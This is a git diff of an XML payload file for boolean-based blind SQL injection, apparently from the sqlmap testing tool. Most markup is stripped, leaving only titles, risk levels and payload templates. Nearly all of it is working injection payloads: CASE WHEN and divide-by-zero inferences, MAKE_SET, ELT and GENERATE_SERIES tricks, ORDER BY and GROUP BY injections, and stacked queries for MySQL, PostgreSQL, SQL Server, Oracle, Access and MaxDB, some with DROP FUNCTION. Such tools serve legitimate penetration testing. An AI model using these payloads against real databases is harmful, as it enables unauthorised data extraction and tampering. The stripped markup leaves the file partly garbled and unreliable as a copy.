diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml index 34cf5f2bc..dc7008767 100644 --- a/xml/payloads/01_boolean_blind.xml +++ b/xml/payloads/01_boolean_blind.xml @@ -32,7 +32,6 @@ Tag: Likelihood of a payload to damage the data integrity. Valid values: - 0: No risk 1: Low risk 2: Medium risk 3: High risk @@ -171,10 +170,27 @@ Tag: + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) + 1 + 2 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + -- + + + AND [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 - 4 + 3 1 1 1 @@ -192,24 +208,23 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (Generic comment) + OR boolean-based blind - WHERE or HAVING clause 1 - 4 - 1 + 1 + 3 1 - 1 - AND [INFERENCE] + 2 + OR ([INFERENCE]) - AND [RANDNUM]=[RANDNUM] - -- + OR ([RANDNUM]=[RANDNUM]) - AND [RANDNUM]=[RANDNUM1] + OR ([RANDNUM]=[RANDNUM1]) - OR boolean-based blind - WHERE or HAVING clause + OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 2 3 @@ -218,6 +233,7 @@ Tag: OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) + -- OR ([RANDNUM]=[RANDNUM1]) @@ -244,23 +260,6 @@ Tag: - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) 1 @@ -283,12 +282,28 @@ Tag: - Generic boolean-based blind - Parameter replace (original value) + Generic boolean-based blind - Parameter replace 1 2 1 1,2,3 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + + + + Generic boolean-based blind - Parameter replace (original value) + 1 + 3 + 1 + 1,2,3 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) @@ -298,10 +313,29 @@ Tag: + + MySQL boolean-based blind - Parameter replace (MAKE_SET) + 1 + 4 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[RANDNUM]) + + MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+ + MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 - 3 + 5 1 1,2,3 3 @@ -318,12 +352,31 @@ Tag: - MySQL boolean-based blind - Parameter replace (ELT - original value) + MySQL boolean-based blind - Parameter replace (ELT) 1 4 1 1,2,3 3 + ELT([INFERENCE],[RANDNUM]) + + ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+ + + + MySQL boolean-based blind - Parameter replace (ELT - original value) + 1 + 5 + 1 + 1,2,3 + 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) @@ -336,10 +389,29 @@ Tag: + + MySQL boolean-based blind - Parameter replace (bool*int) + 1 + 5 + 1 + 1,2,3 + 3 + ([INFERENCE])*[RANDNUM] + + ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL +
+ + MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 - 4 + 5 1 1,2,3 3 @@ -358,7 +430,7 @@ Tag: MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 - 3 + 1 1 1,2,3 3 @@ -378,7 +450,7 @@ Tag: MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 - 4 + 2 1 1,2,3 3 @@ -395,18 +467,76 @@ Tag: - PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + PostgreSQL boolean-based blind - Parameter replace 1 3 - 2 + 1 1,2,3 3 - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END)) - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+ + + + PostgreSQL boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+ + + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) + 1 + 3 + 1 + 1,2,3 + 3 + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL @@ -496,7 +626,7 @@ Tag: Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 - 3 + 2 1 2,3 1 @@ -512,7 +642,7 @@ Tag: Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 - 4 + 3 1 2,3 1 @@ -532,6 +662,26 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
+ MySQL + >= 5.0 +
+ + + + MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) @@ -552,6 +702,25 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+ + + + MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 5 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) @@ -564,6 +733,70 @@ Tag:
+ + PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+ + + + + PostgreSQL boolean-based blind - ORDER BY clauses (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+ + + + + + PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value) + 1 + 3 + 1 + + 3 + 1 + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+ + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 @@ -571,6 +804,27 @@ Tag: 1 3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) @@ -592,6 +846,25 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+ + + + Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) @@ -611,6 +884,25 @@ Tag: 1 2,3 1 + ,IIF([INFERENCE],1,1/0) + + ,IIF([RANDNUM]=[RANDNUM],1,1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+ + + + Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) @@ -622,24 +914,102 @@ Tag: Microsoft Access - - - - PostgreSQL stacked conditional-error blind queries + SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses 1 3 - 0 - 0 - 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) + +
+ SAP MaxDB +
+ + + + SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + +
+ SAP MaxDB +
+ + + + + + MySQL >= 5.0 boolean-based blind - Stacked queries + 1 + 3 + 1 + 0 + 1 + ;(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + ;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + # + + + ;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
+ MySQL + >= 5.0 +
+ + + + MySQL < 5.0 boolean-based blind - Stacked queries + 1 + 4 + 1 + 0 + 1 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + # + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+ + + + PostgreSQL boolean-based blind - Stacked queries + 1 + 2 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL @@ -647,19 +1017,19 @@ Tag: - Microsoft SQL Server/Sybase stacked conditional-error blind queries + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries 1 - 3 - 0 + 2 + 1 0 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server @@ -667,5 +1037,5 @@ Tag: Windows
- +